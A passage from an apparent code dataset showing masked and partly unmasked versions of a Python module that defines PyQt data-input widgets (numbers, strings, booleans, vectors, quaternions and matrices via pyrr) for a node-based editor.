self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass BoolInputWidget(InputWidgetSingle):\n <mask token>\n\n def __init__(self, parent=None, **kwds):\n super(BoolInputWidget, self).__init__(parent=parent, **kwds)\n self.cb = QCheckBox(self)\n self.setWidget(self.cb)\n self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(\n val)))\n <mask token>\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, self.dsbm33]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n\n\nclass Matrix44InputWidget(InputWidgetRaw, Matrix44InputWidget_ui.Ui_Form):\n \"\"\"Matrix44 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix44InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm14.valueChanged.connect(self.m14Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm24.valueChanged.connect(self.m24Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.dsbm34.valueChanged.connect(self.m34Changed)\n self.dsbm41.valueChanged.connect(self.m41Changed)\n self.dsbm42.valueChanged.connect(self.m42Changed)\n self.dsbm43.valueChanged.connect(self.m43Changed)\n self.dsbm44.valueChanged.connect(self.m44Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix44([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value(), self.dsbm14.value()], [self.dsbm21.value(),\n self.dsbm22.value(), self.dsbm23.value(), self.dsbm24.value()],\n [self.dsbm31.value(), self.dsbm32.value(), self.dsbm33.value(),\n self.dsbm34.value()], [self.dsbm41.value(), self.dsbm42.value(),\n self.dsbm43.value(), self.dsbm44.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm14, self.\n dsbm21, self.dsbm22, self.dsbm23, self.dsbm24, self.dsbm31,\n self.dsbm32, self.dsbm33, self.dsbm34, self.dsbm41, self.dsbm42,\n self.dsbm43, self.dsbm44]\n for sb in ls:\n sb.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n sb.setSingleStep(FLOAT_SINGLE_STEP)\n sb.setDecimals(FLOAT_DECIMALS)\n\n def m11Changed(self, val):\n m = self.asDataTypeClass()\n m.m11 = val\n self.dataSetCallback(m)\n\n def m12Changed(self, val):\n m = self.asDataTypeClass()\n m.m12 = val\n self.dataSetCallback(m)\n\n def m13Changed(self, val):\n m = self.asDataTypeClass()\n m.m13 = val\n self.dataSetCallback(m)\n\n def m14Changed(self, val):\n m = self.asDataTypeClass()\n m.m14 = val\n self.dataSetCallback(m)\n\n def m21Changed(self, val):\n m = self.asDataTypeClass()\n m.m21 = val\n self.dataSetCallback(m)\n\n def m22Changed(self, val):\n m = self.asDataTypeClass()\n m.m22 = val\n self.dataSetCallback(m)\n\n def m23Changed(self, val):\n m = self.asDataTypeClass()\n m.m23 = val\n self.dataSetCallback(m)\n\n def m24Changed(self, val):\n m = self.asDataTypeClass()\n m.m24 = val\n self.dataSetCallback(m)\n\n def m31Changed(self, val):\n m = self.asDataTypeClass()\n m.m31 = val\n self.dataSetCallback(m)\n\n def m32Changed(self, val):\n m = self.asDataTypeClass()\n m.m32 = val\n self.dataSetCallback(m)\n\n def m33Changed(self, val):\n m = self.asDataTypeClass()\n m.m33 = val\n self.dataSetCallback(m)\n\n def m34Changed(self, val):\n m = self.asDataTypeClass()\n m.m34 = val\n self.dataSetCallback(m)\n\n def m41Changed(self, val):\n m = self.asDataTypeClass()\n m.m41 = val\n self.dataSetCallback(m)\n\n def m42Changed(self, val):\n m = self.asDataTypeClass()\n m.m42 = val\n self.dataSetCallback(m)\n\n def m43Changed(self, val):\n m = self.asDataTypeClass()\n m.m43 = val\n self.dataSetCallback(m)\n\n def m44Changed(self, val):\n m = self.asDataTypeClass()\n m.m44 = val\n self.dataSetCallback(m)\n\n def setWidgetValue(self, val):\n self.dsbm11.setValue(val.m11)\n self.dsbm12.setValue(val.m12)\n self.dsbm13.setValue(val.m13)\n self.dsbm14.setValue(val.m14)\n self.dsbm21.setValue(val.m21)\n self.dsbm22.setValue(val.m22)\n self.dsbm23.setValue(val.m23)\n self.dsbm24.setValue(val.m24)\n self.dsbm31.setValue(val.m31)\n self.dsbm32.setValue(val.m32)\n self.dsbm33.setValue(val.m33)\n self.dsbm34.setValue(val.m34)\n self.dsbm41.setValue(val.m41)\n self.dsbm42.setValue(val.m42)\n self.dsbm43.setValue(val.m43)\n self.dsbm44.setValue(val.m44)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass EnumInputWidget(InputWidgetSingle):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass FloatInputWidget(InputWidgetSingle):\n \"\"\"\n Floating point data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(FloatInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QDoubleSpinBox(self)\n _configDoubleSpinBox(self.sb)\n self.setWidget(self.sb)\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(float(val))\n\n\nclass IntInputWidget(InputWidgetSingle):\n \"\"\"\n Decimal number input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(IntInputWidget, self).__init__(parent=parent, **kwds)\n self.sb = QSpinBox(self)\n _configIntSpinBox(self.sb)\n self.setWidget(self.sb)\n self.sb.valueChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.sb.setValue(int(val))\n\n\nclass NoneInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(NoneInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n self.le.setEnabled(False)\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\n\nclass StringInputWidget(InputWidgetSingle):\n \"\"\"\n String data input widget\n \"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(StringInputWidget, self).__init__(parent=parent, **kwds)\n self.le = QLineEdit(self)\n self.le.setContextMenuPolicy(QtCore.Qt.NoContextMenu)\n self.setWidget(self.le)\n self.le.textChanged.connect(lambda val: self.dataSetCallback(val))\n\n def setWidgetValue(self, val):\n self.le.setText(str(val))\n\n\nclass BoolInputWidget(InputWidgetSingle):\n \"\"\"Boolean data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(BoolInputWidget, self).__init__(parent=parent, **kwds)\n self.cb = QCheckBox(self)\n self.setWidget(self.cb)\n self.cb.stateChanged.connect(lambda val: self.dataSetCallback(bool(\n val)))\n\n def setWidgetValue(self, val):\n if bool(val):\n self.cb.setCheckState(QtCore.Qt.Checked)\n else:\n self.cb.setCheckState(QtCore.Qt.Unchecked)\n\n\nclass FloatVector3InputWidget(InputWidgetRaw, FloatVector3InputWidget_ui.\n Ui_Form):\n \"\"\"Vector3 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector3InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector3([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n\n\nclass FloatVector4InputWidget(InputWidgetRaw, FloatVector4InputWidget_ui.\n Ui_Form):\n \"\"\"Vector4 data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(FloatVector4InputWidget, self).__init__(**kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbX.valueChanged.connect(self._onDataChangedX)\n self.dsbY.valueChanged.connect(self._onDataChangedY)\n self.dsbZ.valueChanged.connect(self._onDataChangedZ)\n self.dsbW.valueChanged.connect(self._onDataChangedW)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Vector4([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n def _configSpinBoxes(self):\n self.dsbX.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbY.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbZ.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbW.setRange(FLOAT_RANGE_MIN, FLOAT_RANGE_MAX)\n self.dsbX.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbY.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbZ.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbW.setSingleStep(FLOAT_SINGLE_STEP)\n self.dsbX.setDecimals(FLOAT_DECIMALS)\n self.dsbY.setDecimals(FLOAT_DECIMALS)\n self.dsbZ.setDecimals(FLOAT_DECIMALS)\n self.dsbW.setDecimals(FLOAT_DECIMALS)\n\n def _onDataChangedX(self, val):\n v = self.asDataTypeClass()\n v.x = val\n self.dataSetCallback(v)\n\n def _onDataChangedY(self, val):\n v = self.asDataTypeClass()\n v.y = val\n self.dataSetCallback(v)\n\n def _onDataChangedZ(self, val):\n v = self.asDataTypeClass()\n v.z = val\n self.dataSetCallback(v)\n\n def _onDataChangedW(self, val):\n v = self.asDataTypeClass()\n v.w = val\n self.dataSetCallback(v)\n\n def setWidgetValue(self, val):\n self.dsbX.setValue(val.x)\n self.dsbY.setValue(val.y)\n self.dsbZ.setValue(val.z)\n self.dsbW.setValue(val.w)\n\n\nclass QuatInputWidget(FloatVector4InputWidget):\n \"\"\"Quaternion data input widget\"\"\"\n\n def __init__(self, **kwds):\n super(QuatInputWidget, self).__init__(**kwds)\n\n def asDataTypeClass(self):\n return pyrr.Quaternion([self.dsbX.value(), self.dsbY.value(), self.\n dsbZ.value(), self.dsbW.value()])\n\n\nclass Matrix33InputWidget(InputWidgetRaw, Matrix33InputWidget_ui.Ui_Form):\n \"\"\"Matrix33 data input widget\"\"\"\n\n def __init__(self, parent=None, **kwds):\n super(Matrix33InputWidget, self).__init__(parent=parent, **kwds)\n self.setupUi(self)\n self._configSpinBoxes()\n self.dsbm11.valueChanged.connect(self.m11Changed)\n self.dsbm12.valueChanged.connect(self.m12Changed)\n self.dsbm13.valueChanged.connect(self.m13Changed)\n self.dsbm21.valueChanged.connect(self.m21Changed)\n self.dsbm22.valueChanged.connect(self.m22Changed)\n self.dsbm23.valueChanged.connect(self.m23Changed)\n self.dsbm31.valueChanged.connect(self.m31Changed)\n self.dsbm32.valueChanged.connect(self.m32Changed)\n self.dsbm33.valueChanged.connect(self.m33Changed)\n self.pbReset.clicked.connect(self.onResetValue)\n\n def asDataTypeClass(self):\n return pyrr.Matrix33([[self.dsbm11.value(), self.dsbm12.value(),\n self.dsbm13.value()], [self.dsbm21.value(), self.dsbm22.value(),\n self.dsbm23.value()], [self.dsbm31.value(), self.dsbm32.value(),\n self.dsbm33.value()]])\n\n def _configSpinBoxes(self):\n ls = [self.dsbm11, self.dsbm12, self.dsbm13, self.dsbm21, self.\n dsbm22, self.dsbm23, self.dsbm31, self.dsbm32, 